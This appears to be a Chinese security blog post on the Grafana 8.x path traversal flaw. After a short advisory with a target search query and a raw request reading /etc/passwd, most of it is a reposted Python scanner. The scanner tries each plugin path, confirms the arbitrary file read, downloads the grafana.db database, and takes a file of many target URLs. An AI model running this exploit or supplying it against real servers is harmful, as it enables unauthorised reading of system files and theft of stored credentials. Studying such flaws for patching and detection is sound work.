遵纪守法
任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益
0x01 前言
Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。2021年12月6日,国外安全研究人员披露Grafana中某些接口在提供静态文件时,攻击者通过构造恶意请求,可造成目录遍历,读取系统上的文件。
0x02 风险等级
高危
0x03 影响版本
Grafana 8.x 系列
0x04 目标
app="grafana"
0x05 漏洞复现
GET /public/plugins/welcome/../../../../../../../../etc/passwd HTTP/1.1
Host: localhost:3000
Connection: close
网上搜集的扫描脚本(来自t00ls[Henry])
#!/usr/bin/env python
# -*- conding:utf-8 -*-
import requests
import argparse
import sys
import urllib3
import time
urllib3.disable_warnings()
def title():
print("""
___ __ ___ _ ___ _ _
/ __| _ _ __ _ / _| __ _ _ _ __ _ | _ \ ___ __ _ __| | | __| (_) | | ___
| (_ | | '_| / _` | | _| / _` | | ' \ / _` | | / / -_) / _` | / _` | | _| | | | | / -_)
\___| |_| \__,_| |_| \__,_| |_||_| \__,_| |_|_\ \___| \__,_| \__,_| |_| |_| |_| \___|
Author: Henry4E36
""")
class information(object):
def __init__(self, args):
self.args = args
self.url = args.url
self.file = args.file
def target_url(self):
lists = ['grafana-clock-panel', 'alertGroups', 'alertlist', 'alertmanager', 'annolist', 'barchart', 'bargauge',\
'canvas', 'cloudwatch', 'cloudwatch', 'dashboard', 'dashboard', 'dashlist', 'debug', 'elasticsearch',\
'gauge','geomap', 'gettingstarted', 'grafana-azure-monitor-datasource', 'grafana', 'graph', 'graphite',\
'graphite', 'heatmap', 'histogram', 'influxdb', 'jaeger', 'live', 'logs', 'logs', 'loki', 'mixed', \
'mssql', 'mysql', 'news', 'nodeGraph', 'opentsdb', 'piechart', 'pluginlist', 'postgres', 'prometheus',\
'stat', 'state-timeline', 'status-history', 'table-old', 'table', 'tempo', 'testdata', 'text', \
'timeseries', 'welcome', 'xychart', 'zipkin']
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0",
}
# proxies = {
# "http": "http://127.0.0.1:8080",
#
# }
for i in lists:
target_url = self.url + f"/public/plugins/{i}/%23/../..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd"
try:
res = requests.get(url=target_url, headers=headers, verify=False, timeout=5)
if res.status_code == 200 and "root:" in res.text:
print(f"\033[31m[{chr(8730)}] 目标系统: {self.url}的{i}插件存在任意文件读取\033[0m")
print(f"[-] 尝试读取DB文件:")
db_url = self.url + f"/public/plugins/{i}/%23/../..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/var/lib/grafana/grafana.db"
try:
res_db = requests.get(url=db_url, headers=headers, verify=False, timeout=25)
if res_db.status_code == 200 and "SQLite format" in res_db.text:
a = time.time()
with open(f'{a}.db', "w") as f:
f.write(res_db.text)
f.close()
print(f"\033[31m[{chr(8730)}] 成功读取DB文件,信息保存在{a}.db文件中\033[0m")
else:
print(f"[-] 读取DB文件失败")
except Exception as e:
print("[\033[31mX\033[0m] 读取DB文件错误,可能与请求时间有关!")
print("[" + "-" * 100 + "]")
else:
print(f"[\033[31mx\033[0m] 目标系统: {self.url} 不存在{i}插件!")
print("[" + "-"*100 + "]")
except Exception as e:
print("[\033[31mX\033[0m] 连接错误!")
print("[" + "-"*100 + "]")
def file_url(self):
with open(self.file, "r") as urls:
for url in urls:
url = url.strip()
if url[:4] != "http":
url = "http://" + url
self.url = url.strip()
information.target_url(self)
if __name__ == "__main__":
title()
parser = ar=argparse.ArgumentParser(description='Grafana 任意文件读取')
parser.add_argument("-u", "--url", type=str, metavar="url", help="Target url eg:\"http://127.0.0.1\"")
parser.add_argument("-f", "--file", metavar="file", help="Targets in file eg:\"ip.txt\"")
args = parser.parse_args()
if len(sys.argv) != 3:
print(
"[-] 参数错误!\neg1:>>>python3 grafana-read.py -u [url]http://127.0.0.1[/url]\neg2:>>>python3 grafana-read.py -f ip.txt")
elif args.url:
information(args).target_url()
elif args.file:
information(args).file_url()
网友评论